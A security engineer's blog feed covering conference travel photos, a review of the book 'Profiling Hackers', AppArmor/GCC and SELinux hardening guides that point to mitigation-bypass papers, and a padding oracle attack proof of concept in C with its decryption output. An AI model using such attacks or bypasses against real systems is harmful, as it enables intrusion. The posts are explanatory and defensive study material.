<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKds3eYJ04cjQXb73BdcO4Yk_2fnqpicNski2OHLvonT5JRUU1Ugyt0ywQWCC3-MJJy8IX4I06phLdTKZO3mCvBIh0n7UIZp9CpoKsACwrMFmGzafsxuGPDapZsApZIEuK5ShJ-w/s1600/20130717_211524.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKds3eYJ04cjQXb73BdcO4Yk_2fnqpicNski2OHLvonT5JRUU1Ugyt0ywQWCC3-MJJy8IX4I06phLdTKZO3mCvBIh0n7UIZp9CpoKsACwrMFmGzafsxuGPDapZsApZIEuK5ShJ-w/s640/20130717_211524.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBP4D6eGEsKDkt8goKZAC6vpk0AcCnrOjACr0KDwEjtL1GovKWOOIGIUx7-CaT3_mPQwpnRYGo-RpEruv90lIz3y_9PtdGAszYTQi-ehDepN0fh0o880jjtAfvworRST-rY82ULQ/s1600/20130718_143505.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBP4D6eGEsKDkt8goKZAC6vpk0AcCnrOjACr0KDwEjtL1GovKWOOIGIUx7-CaT3_mPQwpnRYGo-RpEruv90lIz3y_9PtdGAszYTQi-ehDepN0fh0o880jjtAfvworRST-rY82ULQ/s640/20130718_143505.jpg" width="640" /></a></div>
<br />
White Tower, or maybe we should call it "The Greece Tower" <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAItEUcG3WKyuPfnAw9kl0ooEJFJOpxAx76FpdyEkA2Tcb2LiZwcHqJaD1MH4QJ1tPd5kXlNX_i0cOtTU1iCJMS73CYs2p_qv504shQeXzw7lcmquGbMYvJwW-c41iiinimOE5NQ/s1600/20130718_152530.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAItEUcG3WKyuPfnAw9kl0ooEJFJOpxAx76FpdyEkA2Tcb2LiZwcHqJaD1MH4QJ1tPd5kXlNX_i0cOtTU1iCJMS73CYs2p_qv504shQeXzw7lcmquGbMYvJwW-c41iiinimOE5NQ/s640/20130718_152530.jpg" width="480" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqBYh0vhSr80SE0VQxzGNffseLiG_cmp08NZbK4I9BvZ0Va3gcT9U3s2uKPNijlzRKdpyuoBLXg_RHCGUF8HdWiIMu9EJCjg19Nbx_b1-zCgQ5NknPtCn1oXzXz4OKVZg88RjZw/s1600/20130718_154558.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqBYh0vhSr80SE0VQxzGNffseLiG_cmp08NZbK4I9BvZ0Va3gcT9U3s2uKPNijlzRKdpyuoBLXg_RHCGUF8HdWiIMu9EJCjg19Nbx_b1-zCgQ5NknPtCn1oXzXz4OKVZg88RjZw/s640/20130718_154558.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8HpLHisVilnhps36f-ZovmHGdJ6C3a9sM-GCi9iN5BqJCx_sscXrz4MoSVeFeYFhUazMJR5hnHbW7-FvYCIGPWfSuSTNUBU84ggGxucuuWFbXOC7G7ZUpgY4k1qqN3mP9U58IpA/s1600/20130718_154619.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8HpLHisVilnhps36f-ZovmHGdJ6C3a9sM-GCi9iN5BqJCx_sscXrz4MoSVeFeYFhUazMJR5hnHbW7-FvYCIGPWfSuSTNUBU84ggGxucuuWFbXOC7G7ZUpgY4k1qqN3mP9U58IpA/s640/20130718_154619.jpg" width="640" /></a></div>
<br />
I hadn't found the ASSOS yet;-) <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxOUraglT7cGb7tPjz8KrdcaFxqPAheLIXRXHuK12Wr2yZwzm0LI3HEyIpbmmgFXbuJAGBQl1-DOQosz7FvZn5rM-7ijcJdQpVhAzokunZ_vpLCWj9wtnRQla8V1L8L6UtfaHEA/s1600/20130718_175419.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxOUraglT7cGb7tPjz8KrdcaFxqPAheLIXRXHuK12Wr2yZwzm0LI3HEyIpbmmgFXbuJAGBQl1-DOQosz7FvZn5rM-7ijcJdQpVhAzokunZ_vpLCWj9wtnRQla8V1L8L6UtfaHEA/s640/20130718_175419.jpg" width="640" /></a></div>
Little dude, you got a gun?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF0tLSEp2yXpa9lOG_8z3NePE29socrxV5gaZfIH3dg_23OAnPAowKcxTa-iFnEv37WNfOzsQM5zX0ATpydduU8DiUwKAU4HEcoNALU7tL2XWotmoProVrZkgIeHClb_973hvc3g/s1600/20130718_234234.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF0tLSEp2yXpa9lOG_8z3NePE29socrxV5gaZfIH3dg_23OAnPAowKcxTa-iFnEv37WNfOzsQM5zX0ATpydduU8DiUwKAU4HEcoNALU7tL2XWotmoProVrZkgIeHClb_973hvc3g/s640/20130718_234234.jpg" width="640" /></a></div>
Olympic Museum, this is the place for osc2013<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbHzwp3AaMojAIDo33xohp_H0RzGW2wc3Z66xaHBhCkVnic2jlu_ulWhZJ6z3JFhI4S8rJC8W5J78GAZiABw2mpDOiMte7EfwwkAAVOk8-MfSmvlnFlvRwVV5P4OHImjj43V2vQ/s1600/20130719_011119.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbHzwp3AaMojAIDo33xohp_H0RzGW2wc3Z66xaHBhCkVnic2jlu_ulWhZJ6z3JFhI4S8rJC8W5J78GAZiABw2mpDOiMte7EfwwkAAVOk8-MfSmvlnFlvRwVV5P4OHImjj43V2vQ/s640/20130719_011119.jpg" width="640" /></a></div>
Gecko money is not a bad idea, is it?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP3vwHMkbqLgYIJb9TJGE7lXQJKmsYPBZOL_SjKrlNFjlgf0WUY0wYLu1mTfGDK0Zc3KOcXhU5evjA-4IiTvQcFc3OTY0ZDwP-liYaslDRfZlQ3Y7URGLXAtvFKgZ_nb6V6NmKhg/s1600/20130719_172224.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP3vwHMkbqLgYIJb9TJGE7lXQJKmsYPBZOL_SjKrlNFjlgf0WUY0wYLu1mTfGDK0Zc3KOcXhU5evjA-4IiTvQcFc3OTY0ZDwP-liYaslDRfZlQ3Y7URGLXAtvFKgZ_nb6V6NmKhg/s640/20130719_172224.jpg" width="640" /></a></div>
Sometimes RMS is wrong. Free speech is like free beer;-) <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkQUbmSbgT-QHia2Wm3KSVpYht7MgAC9olw9D_byt4qvMTrdugBudjbQ6hGg__ZmR-fS1bY5aqFmkB-Qnp5p6BOjlkew-hznd1M-oqqKH8AjiCaPxTqWf1BcOCwVZG-5_c7aYmQ/s1600/20130722_182900.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkQUbmSbgT-QHia2Wm3KSVpYht7MgAC9olw9D_byt4qvMTrdugBudjbQ6hGg__ZmR-fS1bY5aqFmkB-Qnp5p6BOjlkew-hznd1M-oqqKH8AjiCaPxTqWf1BcOCwVZG-5_c7aYmQ/s640/20130722_182900.jpg" width="640" /></a></div>
July 23, people are gone<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFbxzYu9FgUkSHexzf6DDGP74lUU_atI37jRvAf2p6r1dU7l6sHLcKF-SM-V5HHWshEVdcjIA7awje2DArKwtCH0KYUURNjV5SC4k1ptvFIh9Rluur97c_y_YNWJuZ5iKuKEwj1A/s1600/20130723_204040.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFbxzYu9FgUkSHexzf6DDGP74lUU_atI37jRvAf2p6r1dU7l6sHLcKF-SM-V5HHWshEVdcjIA7awje2DArKwtCH0KYUURNjV5SC4k1ptvFIh9Rluur97c_y_YNWJuZ5iKuKEwj1A/s640/20130723_204040.jpg" width="640" /></a></div>
I love this shit!@#$%^&*()<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhCwy7BFQKot1S-pG1kv-RffNKEELt1jgyS5u6CW12gV8mFWGDCdUu26VaQJWavVPHrT-49idsJLjFqY8LaWKJZsiIkM2fnlszSy5zZJ4BUejYe9ePsvIUCc7ibO10W37_0pmf7Q/s1600/20130724_005307.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhCwy7BFQKot1S-pG1kv-RffNKEELt1jgyS5u6CW12gV8mFWGDCdUu26VaQJWavVPHrT-49idsJLjFqY8LaWKJZsiIkM2fnlszSy5zZJ4BUejYe9ePsvIUCc7ibO10W37_0pmf7Q/s640/20130724_005307.jpg" width="640" /></a></div>
Istanbul - on the map of Civilization IV, does it ring a bell?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlGgDqtnNHFjMo_EheUMOwIf34OTjP0w6yRGVci7WppwgMnaJWfLPceMkJOPuNE2J1tjEsOBCiruORFRlc9m9RWGsWyXcJk5Yz2TEcxIyfJmr89gaaykWs9QQCgnyFbO9_6A2mw/s1600/20130724_214306.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlGgDqtnNHFjMo_EheUMOwIf34OTjP0w6yRGVci7WppwgMnaJWfLPceMkJOPuNE2J1tjEsOBCiruORFRlc9m9RWGsWyXcJk5Yz2TEcxIyfJmr89gaaykWs9QQCgnyFbO9_6A2mw/s640/20130724_214306.jpg" width="640" /></a></div>
Awesome architecture...........<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZeikOaXW6smLduZhFqPjwV0or9gw3FysCkfPOpi0mXWwDdJzkH50rk5pqHzuLe6zVRnun_UBzHCr-4U-3XS2dWXfeLkwT-17PSxqWUMco3rSSdGV1zgNKqV6xx69bebgYhotQEg/s1600/20130718_190351.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZeikOaXW6smLduZhFqPjwV0or9gw3FysCkfPOpi0mXWwDdJzkH50rk5pqHzuLe6zVRnun_UBzHCr-4U-3XS2dWXfeLkwT-17PSxqWUMco3rSSdGV1zgNKqV6xx69bebgYhotQEg/s640/20130718_190351.jpg" width="640" /></a></div>
<br />tag:blogger.com,1999:blog-35345954.post-40785623410337537392013-07-03T18:54:00.000+08:002013-07-03T18:54:01.093+08:00 Review of the book "Profiling Hackers"<br /><pre wrap="">I've been reading the book <a href="http://www.amazon.com/Profiling-Hackers-Science-Criminal-Applied/dp/1420086936" target="_blank">Profiling Hackers</a> recently. For now, I've only looked through a little bit of it. Some topics are very interesting, so I'd like to share them with you guys.</pre>
<pre wrap=""> </pre>
<pre wrap="">This book lists some questions:</pre>
<pre wrap="">
</pre>
<pre wrap="">---------------------------------------------------
Why am I interested in hacking?
What are my objectives?
What am I trying to obtain through hacking?
What do I want to become?
What do I want people to think of me?
How do I want to be remembered, and what for?
---------------------------------------------------
It's a matter of the motivation for hacking. IMHO, hackers are always hacking for fun and, yes, indeed (we can't deny it, right-_-)..for profit. Aleph One's paper title ("Smashing The Stack For Fun And Profit") was a sort of philosophical metaphor;-) Both motivations (fun/profit) are very important, because if a security guy only cares about one of them, it would be devastating for that person's (hacker's) life. </pre>
<pre wrap=""> </pre>
<pre wrap="">* Fun? To some hackers, hacking is part of their life. They can't live without hacking. They are full of joy while writing exploits...</pre>
<pre wrap=""> </pre>
<pre wrap="">* Profit? Money, of course. White hats work for commercial companies. Black hats?</pre>
<pre wrap=""> </pre>
<pre wrap="">* Both white hats and black hats may sell exploits or get involved in underground business</pre>
<pre wrap=""> </pre>
<pre wrap=""> </pre>
<pre wrap="">But....as a hacker, if we: </pre>
<pre wrap="">Only have the "fun" part: too spiritual, dude... and it's hard to make people (the industry) believe you in real-life sec engineering.... Well, if security is not your day job, that's another story;-)
Only have the "profit" part:
even worse, just like a lot of security conference runners (whores-_-) who have only one slide/topic and goof around the world. They are a bunch of walking dead.
As a real hacker, I do believe that he/she would have both of them.
And the book also talks about the common traits of hackers, regardless of age, profession, ethnicity, etc:</pre>
<pre wrap=""> </pre>
<pre wrap="">------------------------------------------------------------------------
* They usually have an above average IQ and great technical and problem-solving skills.
* They are brilliant adolescents, suffocated by an inadequate school system and by ill-prepared or poorly equipped teachers.
* They generally come from problem families.
* They rebel against all symbols or expressions of authority.
------------------------------------------------------------------------
It's true, except the 3rd one is a little bit vague. How do you define "problem families"? Divorce? Or something else? If it means a family lacking proper (btw: wth is *proper*) education/homeschooling for the kid, well...that would mean a huge number of families.
I haven't finished reading it. It's a really great book. I never found a book that offered a sociological way to discuss hackers. The Hacker Ethic and the Spirit of the Information Age did some aspects of the work, but Pekka was more focused on the generic hacker (not only in the computer/sec field).
</pre>
tag:blogger.com,1999:blog-35345954.post-16345046483054433032013-05-22T17:45:00.002+08:002013-05-28T12:10:05.170+08:00 How to harden your own program in GNU/Linux<br />Platform: openSUSE 12.3<br />
<br />
AppArmor is an implementation of confinement (mandatory access control). It can help you contain unknown attacks such as 0-day exploits: a confined program can only touch what its profile allows, no matter what the attacker makes it do. On openSUSE/Ubuntu it's very easy to install. On openSUSE 12.3, type "yast2" in a terminal or use the GUI software manager to install AppArmor. Once it is installed, you need to create a profile for the program you want to harden.<br />
<br />
First, please download the <a href="https://github.com/citypw/citypw-SCFE/tree/master/security/apparmor_test" target="_blank">example files here</a>. Then compile the program:<br />
<br />
shawn@linux-sk8j:~> gcc apparmor_test.c<br />
<br />
Generate the profile for your program: <br />
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out <br />
<br />
We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:<br />
<br />
#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.<br />
<br />
.........................................<br />
.........................................<br />
.........................................<br />
<br />
Finished generating profile for /home/shawn/a.out.<br />
-----------------------------------------------------------<br />
<br />
Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few lines to it so that it looks like this:<br />
<br />
#include &lt;tunables/global&gt;<br />
<br />
/home/shawn/a.out {<br />
#include &lt;abstractions/base&gt;<br />
<br />
/home/shawn/a.out mr,<br />
/home/shawn/hello r,<br />
/home/shawn/world w,<br />
network stream,<br />
}<br />
<br />
Because AppArmor uses a whitelist-like policy by default, the above example means: this program( a.out) is only allowed read permission on the file /home/shawn/hello, write permission on the file /home/shawn/world, and the TCP connection; everything else is denied. If this program has a stack-based buffer overflow, an attacker might want to spawn a shell by exploiting it. Under this profile, that is not going to happen, because executing a shell is not on the whitelist. For further reading about AppArmor profiles, you might be interested in <a href="http://www.insanitybit.com/tag/apparmor/" target="_blank">this article</a>. Other similar implementations like SELinux and Grsecurity/PaX can achieve the same goal. SELinux is the most powerful one, but also the most difficult to use.<br />
<br />
When you have done the confinement hardening, there are also a lot of mitigation technologies you should consider. They are much easier to use. Please keep this in mind: these defensive technologies are what we call "mitigations", which means that skilled hackers or attackers still have the ability to bypass them. It's only a matter of time.<br />
<br />
GCC options:<br />
------------------------------------------------ <br />
Stack canary:<br />
-fstack-protector, only functions with local character arrays are protected<br />
-fstack-protector-all, protects every function in your program<br />
<br />
Bypass method, please check <a href="http://www.phrack.org/issues.html?issue=67&id=13&mode=txt" target="_blank">Scraps of notes on remote stack overflow exploitation</a> in Phrack Issue 67.<br />
<br />
Heap( malloc() corruption check):<br />
enabled by default since glibc 2.5; please use the latest version of glibc.<br />
<br />
Position-Independent-Executable:<br />
-pie, so that the executable itself takes advantage of the ASLR provided by the kernel. Remember to turn on your ASLR:<br />
<br />
<br />
Bypass method, please check <a href="http://phrack.org/issues.html?issue=59&id=9&mode=txt" target="_blank">Bypassing PaX ASLR protection</a> in Phrack Issue 59. Yes, it's an old paper, but it's still worth reading.<br />
<br />
Hardening the GOT of ELF binaries against memory corruption attacks:<br />
-z relro, Partial RELRO<br />
-z relro -z now, Full RELRO<br />
<br />
Bypass method, please check <a href="http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/" target="_blank">The Art Of ELF: Analysis and Exploitations</a><br />
<br />
String vulnerability mitigation:<br />
-D_FORTIFY_SOURCE=2 (needs -O1 or higher), adds checks to common string/memory functions and mitigates format string vulns<br />
<br />
Bypass method, please check <a href="http://www.phrack.org/issues.html?issue=67&id=9&mode=txt" target="_blank">A Eulogy for Format Strings</a> in Phrack Issue 67.<br />
<br />
Non-executable stack:<br />
-z noexecstack (a linker option, i.e. -Wl,-z,noexecstack when invoked via gcc)<br />
<br />
Well, there are a lot of ways to bypass it.<br />
<br />
I also made a list a few months ago. You may want to <a href="https://github.com/citypw/security-regression-testing-for-suse/blob/master/other/vulns_hardening_assessment.log" target="_blank">check it</a> too. Yes, there are a lot of mitigation techniques and a lot of bypass techniques. Offensive and defensive technologies are like brothers. The only thing is, they will fight each other to the end of the world;-)<br />
<br />
btw: You don't need to worry about the performance hit when you turn on these mitigation techniques, except for -fstack-protector-all. That's it!<br />
<br />
May L0rd's hacking spirit guide us!!!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com35tag:blogger.com,1999:blog-35345954.post-2908988080599806632013-04-26T20:20:00.002+08:002013-04-27T09:46:35.617+08:00Padding Oracle Attack PoC in C<pre>I'm a newbie on crypto field. *Unfortunately*, I need to deal with some
open source security stuff( openssl and gnutls) in my day job. Yes,
don't be so sad for me;-) I can handle it so far. I need to know more
knowledge about crypto. The best way to do it is writing xxx-attack
PoC. Then I've heard of Lucky-13 is something. Backport these patches
from upstream drives me crazy. Dude, you known~ 13 openssl upstream
commits( more than 1,700 loc modifies) were only for fix one security
issue what called Lucky-13 Thirteen which was disclosured in Feb 2013. It
was my honor to do this shitload work with very very low salary;-)
After I finished it, a very serious question came out of my mind: What
if another tens of shitload work pop up in the future but with no help
from the upstream community? Well...I have to eat the rocket by my own
hands. F0r preparing to handle such situation, I need to know the
detail of the attack. That's why I wrote the padding oracle attack
PoC( <a href="https://github.com/citypw/arsenal-4-sec-testing/tree/master/libcrypto/lucky-what" target="_blank">Download here</a>).
I googled "padding oracle attack". I found 3 guys wrote their own
padding oracle attack PoC/tools in 3 differnt languages: perl, ruby
and python. I looked their code and articles. They guys are awesome!
Brian Holyfield( Perl guy) wrote this very good article and more
importantly it's easy to understand:
<a href="http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html">http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html</a>
Daoge( python one) is a CHiense hacker who are good at web
security:
<a href="http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6">http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6</a>
Ron Bowes( Ruby guy) gave us a great presentation at Shmoocon 2013. I
really thank his practical advice. He wrote two articles about padding
oracle attack. The 1st one introduce the principle and the 2nd is
giving an great example.
<a href="http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth">http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth</a>
<a href="http://www.skullsecurity.org/blog/2013/a-padding-oracle-example">http://www.skullsecurity.org/blog/2013/a-padding-oracle-example</a>
Well, I'm a kind of old school guy. I decided write it in
C( not old enough as asm). This example is simple:
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make
gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto
done
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc
Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b
Decrypting now
205 is done: 00000000000000ce3faf089c7a924a7b
36 is done: 00000000000025cd3faf089c7a924a7b
214 is done: 0000000000d724cc3faf089c7a924a7b
230 is done: 00000000e7d023cb3faf089c7a924a7b
80 is done: 00000051e6d122ca3faf089c7a924a7b
110 is done: 00006f52e5d221c93faf089c7a924a7b
137 is done: 008a6e53e4d320c83faf089c7a924a7b
248 is done: f985615cebdc2fc73faf089c7a924a7b
The original plaintext is: "Hello World"
The one last block of plaintext: 726c6405050505050000000000000000
----> rld</pre>
<pre>btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field... </pre>
Anonymous, http://www.blogger.com/profile/13974563038012930535<br />
<br />
How to enable SELinux in SLES 11 SP2 (2013-04-17)<br />
I've been playing with SELinux for a few days. Once you decide to hack on SELinux, a very long hacking journey begins. The 1st shit you need to do is to enable SELinux before you dive into the details. Yes, you may already know these great resources that can help your SELinux hacking journey:<br />
<br />
1, <a href="http://selinuxproject.org/page/Main_Page" target="_blank">SELinux project wiki</a><br />
2, <a href="http://www.freetechbooks.com/the-selinux-notebook-the-foundations-t785.html" target="_blank">The SELinux Notebook - The Foundations - 3rd Edition</a> <br />
<br />
SELinux is already compiled into the SUSE Linux Enterprise Server 11 SP2 kernel, but without any specific policies. OK then, I've bullshitted a lot, haven't I? Please allow me to bullshit a lot more;-)<br />
<br />
Firstly, make sure SLES 11 SP2 is working well:<br />
-------------------------------------------------------------------------------- <br />
shawn-fortress:~ # cat /etc/issue<br /><br />Welcome to SUSE Linux Enterprise Server 11 SP2 (i586) - Kernel \r (\l).<br />
-------------------------------------------------------------------------------- <br />
<br />
Install these packages which are needed for SELinux:<br />
-------------------------------------------------------------------------------- <br />
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils<br />--------------------------------------------------------------------------------<br />
<br />
<br />Type "yast2 bootloader" in cmdline and add:<br />
-------------------------------------------------------------------------------- <br />
"security=selinux selinux=1 enforcing=0" into the kernel cmdline<br />
--------------------------------------------------------------------------------<br />
On the GRUB kernel command line, these three options are the ones related to SELinux:<br />
* security=selinux, tells the kernel to use SELinux and not AppArmor<br />
* selinux=1, switches on SELinux<br />
* enforcing=0, puts SELinux in permissive mode (denials are only logged, not enforced)<br />
<br />
<br />
Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":<br />
-------------------------------------------------------------------------------- <br />http://software.opensuse.org/package/selinux-tools<br />--------------------------------------------------------------------------------<br />
<br />Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":<br />
-------------------------------------------------------------------------------- <br />http://software.opensuse.org/package/selinux-policy<br />--------------------------------------------------------------------------------<br />
<br />
Add selinux to existing PAM config file:<br />
-------------------------------------------------------------------------------- <br />
pam-config -a --selinux<br />
-------------------------------------------------------------------------------- <br /><br />
Set the restorecond service to runlevel 3 in "expert mode":<br />
-------------------------------------------------------------------------------- <br />yast2 runlevel<br />--------------------------------------------------------------------------------<br />
<br />Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:<br />
<br />shawn-fortress:~ # sestatus<br />
SELinux status: enabled<br />
SELinuxfs mount: /selinux<br />
Current mode: permissive<br />
Mode from config file: permissive<br />
Policy version: 26<br />
Policy from config file: refpolicy-standard<br />
<br />
See, it's working!<br />
<br />
Thanks to Thomas Biege, who is guiding me on this journey! Thomas's article "<a href="http://thetoms-random-thoughts.blogspot.com/2008/12/selinux-on-opensuse-111.html" target="_blank">SELinux on openSUSE 11.1</a>" helped me understand the SELinux configuration in the big picture.<br />
<br />
May L0rd's hacking spirit guide us!<br />
Anonymous, http://www.blogger.com/profile/13974563038012930535<br />
<br />
Vuln assessment for PALADIN forensic tools free version (2013-04-01)<br />
I went to the China Mac Forensic Conference last week. This was the 1st time I attended a security con about forensics. Some security guys gave us a few free speeches, all about forensics. In the forensics field, the only tool I knew was <a href="http://www.rootkit.nl/projects/lynis.html" target="_blank">Lynis</a>, which was written by <a href="http://www.rootkit.nl/about/" target="_blank">Michael Boelen</a>. They were talking about forensics on Mac/iOS platforms in the morning. That made me a little bored. But what else could I complain about? This conference is called Mac-Forensic*. Fortunately, I found something very interesting in the afternoon. A company named <a href="http://sumuri.com/" target="_blank">SUMURI</a> provides a forensic solution based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up on the spot. Well, I was fuc* excited, because I had gotten tens of shitloads of information about Mac/iOS that day, and now I had something I'm familiar with: GNU/Linux. I found some potential risks in the PALADIN GNU/Linux distro. I've already notified them. Hope they can spend more time on sec stuff.<br />
<br />
OK. When PALADIN boots up, you can see the Ubuntu-like( Unity?) GUI: <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYz4Qqh7KJq0PiBqOAsEFBLuY8LGIE9SJcORll96hyphenhyphenBy_GSC6eTG4CdPkZYCX2-zNU17kqRvZZNUYibLOz6CKwo0miQZBYq4-WYqICjnYHS8jqcQA2LjyMG0Uhxjg-op9eAvmSbw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYz4Qqh7KJq0PiBqOAsEFBLuY8LGIE9SJcORll96hyphenhyphenBy_GSC6eTG4CdPkZYCX2-zNU17kqRvZZNUYibLOz6CKwo0miQZBYq4-WYqICjnYHS8jqcQA2LjyMG0Uhxjg-op9eAvmSbw/s640/1.png" width="640" /></a></div>
<br />
PALADIN provides a lot of open source forensic tools:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Qxl7VTX5IZv20jgcxMuDNfh16Frsvx_CJxkJtBsb0peSVL4HUOpRmPXLPttC7wFYAEvT7pb7QeZxUCSvpZYCb_eyQwD4cjUEGg-z6m2pxVAOQclR3MguF1ECaiV3s-rWfn5Zgg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Qxl7VTX5IZv20jgcxMuDNfh16Frsvx_CJxkJtBsb0peSVL4HUOpRmPXLPttC7wFYAEvT7pb7QeZxUCSvpZYCb_eyQwD4cjUEGg-z6m2pxVAOQclR3MguF1ECaiV3s-rWfn5Zgg/s640/2.png" width="640" /></a></div>
<br />
In the free version, the only closed tool is "PALADIN Toolbox", which can be found on the Desktop; the binary file is located at /usr/bin/toolbox. This binary uses many free/open source libraries. The 1st potential issue is violation of free/open source licenses. So I asked Steve Whalen, CFCE, "are you sure that toolbox has no violation of the free/open source licenses" on the spot. He was quite sure that the toolbox does not violate any free/open source licenses:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Oy5Y55c4bWTXeZ81kPqOaAwcvtBM6-pM_7rzrWh3OfRLIXqBSv8I4JZiJIpPEmbRm08rRm1taYDmTKaPU1j3RK_8GccKS43t3qwZkXVjHsuwvJxZ4dlHqGw4XdlPpIRRFvxmRA/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Oy5Y55c4bWTXeZ81kPqOaAwcvtBM6-pM_7rzrWh3OfRLIXqBSv8I4JZiJIpPEmbRm08rRm1taYDmTKaPU1j3RK_8GccKS43t3qwZkXVjHsuwvJxZ4dlHqGw4XdlPpIRRFvxmRA/s640/3.png" width="640" /></a></div>
Then, I took a few mins to investigate the binary. Firstly, the entry address:<br />
<div class="separator" style="clear: both; text-align: center;">
